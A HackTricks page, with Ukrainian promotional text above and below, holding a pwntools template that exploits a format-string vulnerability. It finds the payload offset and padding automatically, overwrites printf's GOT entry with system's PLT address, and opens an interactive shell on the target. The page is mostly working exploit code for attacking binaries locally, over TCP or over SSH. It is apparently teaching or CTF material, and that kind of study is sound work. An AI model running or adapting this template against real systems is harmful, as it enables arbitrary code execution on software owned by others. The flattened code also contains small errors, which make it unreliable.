7.3 KiB
Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)!
Інші способи підтримки HackTricks:
- Якщо ви хочете побачити вашу компанію рекламовану на HackTricks або завантажити HackTricks у форматі PDF, перевірте ПЛАНИ ПІДПИСКИ!
- Отримайте офіційний PEASS & HackTricks мерч
- Відкрийте для себе Сім'ю PEASS, нашу колекцію ексклюзивних NFT
- Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами на Twitter 🐦 @hacktricks_live.
- Поділіться своїми хакерськими трюками, надсилайте PR до HackTricks і HackTricks Cloud репозиторіїв на GitHub.
###################
CONNECTION
###################
Define how you want to exploit the binary
LOCAL = True REMOTETTCP = False REMOTESSH = False GDB = False
Configure vulnerable binary
LOCAL_BIN = "./tyler" REMOTE_BIN = "./tyler" #For ssh
In order to exploit the format string you may need to append/prepend some string to the payload
configure them here
PREFIX_PAYLOAD = b"" SUFFIX_PAYLOAD = b"" NNUM_ALREADY_WRITTEN_BYTES = 0 MAX_LENTGH = 999999 #Big num if not restricted
print(" ====================== ") print("Selected options:") print(f"PREFIX_PAYLOAD: {PREFIX_PAYLOAD}") print(f"SUFFIX_PAYLOAD: {SUFFIX_PAYLOAD}") print(f"NNUM_ALREADY_WRITTEN_BYTES: {NNUM_ALREADY_WRITTEN_BYTES}") print(" ====================== ")
def connect_binary(): global P, ELF_LOADED, ROP_LOADED
if LOCAL: P = process(LOCAL_BIN) # start the vuln binary ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets
elif REMOTETTCP: P = remote('10.10.10.10',1338) # start the vuln binary ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets
elif REMOTESSH: ssh_shell = ssh('bandit0', 'bandit.labs.overthewire.org', password='bandit0', port=2220) P = ssh_shell.process(REMOTE_BIN) # start the vuln binary ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary ROP_LOADED = ROP(elf)# Find ROP gadgets
#######################################
Get format string configuration
#######################################
def send_payload(payload): payload = PREFIX_PAYLOAD + payload + SUFFIX_PAYLOAD log.info("payload = %s" % repr(payload)) if len(payload) > MAX_LENTGH: print("!!!!!!!!! ERROR, MAX LENGTH EXCEEDED") P.sendline(payload) sleep(0.5) return P.recv()
def get_formatstring_config(): global P
for offset in range(1,1000): connect_binary() P.clean()
payload = b"AAAA%" + bytes(str(offset), "utf-8") + b"$p" recieved = send_payload(payload).strip()
if b"41" in recieved: for padlen in range(0,4): if b"41414141" in recieved: connect_binary() payload = b" "*padlen + b"BBBB%" + bytes(str(offset), "utf-8") + b"$p" recieved = send_payload(payload).strip() print(recieved) if b"42424242" in recieved: log.info(f"Found offset ({offset}) and padlen ({padlen})") return offset, padlen
else: connect_binary() payload = b" " + payload recieved = send_payload(payload).strip()
In order to exploit a format string you need to find a position where part of your payload
is being reflected. Then, you will be able to put in the position arbitrary addresses
and write arbitrary content in those addresses
Therefore, the function get_formatstring_config will find the offset and padd needed to exploit the format string
offset, padlen = get_formatstring_config()
In this template, the GOT of printf (the part of the GOT table that points to where the printf
function resides) is going to be modified by the address of the system inside the PLT (the
part of the code that will jump to the system function).
Therefore, next time the printf function is executed, system will be executed instead with the same
parameters passed to printf
In some scenarios you will need to loop1 more time to the vulnerability
In that cases you need to overwrite a pointer in the .fini_array for example
Uncomment the commented code below to gain 1 rexecution extra
#P_FINI_ARRAY = ELF_LOADED.symbols["__init_array_end"] # .fini_array address #INIT_LOOP_ADDR = 0x8048614 # Address to go back SYSTEM_PLT = ELF_LOADED.plt["system"] P_GOT = ELF_LOADED.got["printf"]
#log.info(f"Init loop address: {hex(INIT_LOOP_ADDR)}") #log.info(f"fini.array address: {hex(P_FINI_ARRAY)}") log.info(f"System PLT address: {hex(SYSTEM_PLT)}") log.info(f"Printf GOT address: {hex(P_GOT)}")
connect_binary() if GDB and not REMOTETTCP and not REMOTESSH:
attach gdb and continue
You can set breakpoints, for example "break *main"
gdb.attach(P.pid, "b *main") #Add more breaks separeted by "\n" sleep(5)
format_string = FmtStr(execute_fmt=send_payload, offset=offset, padlen=padlen, numbwritten=NNUM_ALREADY_WRITTEN_BYTES) #format_string.write(P_FINI_ARRAY, INIT_LOOP_ADDR) format_string.write(P_GOT, SYSTEM_PLT) format_string.execute_writes()
Now that printf function is executing system you just need to find a place where you can
control the parameters passed to printf to execute arbitrary code.
P.interactive()
<details>
<summary><strong>Вивчайте хакінг AWS від нуля до героя з</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Інші способи підтримки HackTricks:
* Якщо ви хочете побачити свою **компанію рекламовану на HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)!
* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com)
* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family)
* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) **і** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **репозиторіїв на GitHub**.
</details>